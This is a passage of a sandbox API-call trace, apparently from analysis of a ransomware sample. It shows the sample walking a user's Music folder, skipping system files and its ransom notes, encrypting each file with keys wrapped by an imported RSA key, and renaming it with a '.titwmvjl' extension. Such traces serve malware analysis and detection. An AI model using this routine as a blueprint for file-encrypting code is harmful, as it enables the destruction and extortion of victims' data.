[0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="ntldr") returned 1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="NTDETECT.COM") returned 1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="Bootfont.bin") returned 1 [0093.475] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\qwBF.wav") returned 44 [0093.475] lstrlenW (lpString=".wav") returned 4 [0093.475] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.476] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".wav ") returned 5 [0093.476] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.476] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.476] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\qwBF.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\qwbf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.476] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.476] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.477] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.477] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.478] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.478] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.478] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.478] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.478] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.478] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.478] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.479] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.479] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.479] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.479] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.479] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.479] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.479] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.479] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.480] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.480] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.480] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5038f8) returned 1 [0093.480] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.480] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.480] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.481] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.481] GetLastError () returned 0x0 [0093.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.481] CryptDestroyKey (hKey=0x5038f8) returned 1 [0093.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.481] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.481] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.482] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503778) returned 1 [0093.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.482] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.482] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.482] GetLastError () returned 0x0 [0093.483] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.483] CryptDestroyKey (hKey=0x503778) returned 1 [0093.483] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.483] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.483] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.483] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.483] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0xe668, lpOverlapped=0x0) returned 1 [0093.494] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff1998, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.494] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe668, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0xe668, lpOverlapped=0x0) returned 1 [0093.495] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.496] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.497] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.501] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.501] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.501] CloseHandle (hObject=0x2b4) returned 1 [0093.502] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\qwBF.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\qwbf.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\qwBF.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\qwbf.wav.titwmvjl"), dwFlags=0x1) returned 1 [0093.502] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.503] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.503] lstrcmpW (lpString1="sEcflb.mp3", lpString2=".") returned 1 [0093.503] lstrcmpW (lpString1="sEcflb.mp3", lpString2="..") returned 1 [0093.503] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\", lpString2="sEcflb.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\sEcflb.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\sEcflb.mp3" [0093.503] lstrlenW (lpString=".titwmvjl") returned 9 [0093.503] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\sEcflb.mp3") returned 46 [0093.503] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.503] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\sEcflb.mp3.titwmvjl") returned 55 [0093.508] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\sEcflb.mp3") returned 46 [0093.508] lstrlenW (lpString=".mp3") returned 4 [0093.508] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.508] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0093.508] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0093.508] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.508] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\sEcflb.mp3") returned 46 [0093.508] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\sEcflb.mp3") returned 46 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="desktop.ini") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="autorun.inf") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="ntuser.dat") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="iconcache.db") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="bootsect.bak") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="boot.ini") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="ntuser.dat.log") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="thumbs.db") returned -1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="ntldr") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="NTDETECT.COM") returned 1 [0093.508] lstrcmpiW (lpString1="sEcflb.mp3", lpString2="Bootfont.bin") returned 1 [0093.508] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\sEcflb.mp3") returned 46 [0093.508] lstrlenW (lpString=".mp3") returned 4 [0093.508] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.509] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0093.509] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.509] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.509] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\sEcflb.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\secflb.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.510] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.510] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.510] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.510] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.511] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.511] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.512] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.512] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.512] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.512] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.512] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.513] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.513] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.513] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.513] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.513] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.514] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.514] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.514] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.514] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503978) returned 1 [0093.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.515] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.515] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.515] GetLastError () returned 0x0 [0093.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.515] CryptDestroyKey (hKey=0x503978) returned 1 [0093.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.515] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.516] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.516] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5033b8) returned 1 [0093.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.516] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.517] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.517] GetLastError () returned 0x0 [0093.517] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.517] CryptDestroyKey (hKey=0x5033b8) returned 1 [0093.517] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.517] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.517] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.517] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.518] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x18f66, lpOverlapped=0x0) returned 1 [0093.532] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffe709a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.532] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18f66, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x18f66, lpOverlapped=0x0) returned 1 [0093.534] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.534] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.552] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.556] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.557] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.557] CloseHandle (hObject=0x2b4) returned 1 [0093.558] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\sEcflb.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\secflb.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\sEcflb.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\secflb.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0093.558] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.663] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.663] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0093.663] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0093.664] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\TITWMVJL-DECRYPT.txt" [0093.664] lstrlenW (lpString=".titwmvjl") returned 9 [0093.664] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\TITWMVJL-DECRYPT.txt") returned 56 [0093.664] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.665] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 65 [0093.665] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\TITWMVJL-DECRYPT.txt") returned 56 [0093.665] lstrlenW (lpString=".txt") returned 4 [0093.665] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.665] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0093.665] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0093.665] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.665] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\TITWMVJL-DECRYPT.txt") returned 56 [0093.665] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\TITWMVJL-DECRYPT.txt") returned 56 [0093.665] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.665] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.665] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0093.665] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.666] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.666] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.666] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0093.666] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0093.666] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.666] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.666] lstrcmpW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2=".") returned 1 [0093.666] lstrcmpW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="..") returned 1 [0093.666] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\", lpString2="Zver54ov-SCrdXAJ.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Zver54ov-SCrdXAJ.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Zver54ov-SCrdXAJ.mp3" [0093.666] lstrlenW (lpString=".titwmvjl") returned 9 [0093.666] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Zver54ov-SCrdXAJ.mp3") returned 56 [0093.666] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.666] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Zver54ov-SCrdXAJ.mp3.titwmvjl") returned 65 [0093.666] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Zver54ov-SCrdXAJ.mp3") returned 56 [0093.666] lstrlenW (lpString=".mp3") returned 4 [0093.666] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.666] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0093.666] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0093.666] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.667] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Zver54ov-SCrdXAJ.mp3") returned 56 [0093.667] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Zver54ov-SCrdXAJ.mp3") returned 56 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="desktop.ini") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="autorun.inf") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="ntuser.dat") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="iconcache.db") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="bootsect.bak") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="boot.ini") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="ntuser.dat.log") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="thumbs.db") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0093.667] lstrcmpiW (lpString1="Zver54ov-SCrdXAJ.mp3", lpString2="KRAB-DECRYPT.html") returned 1 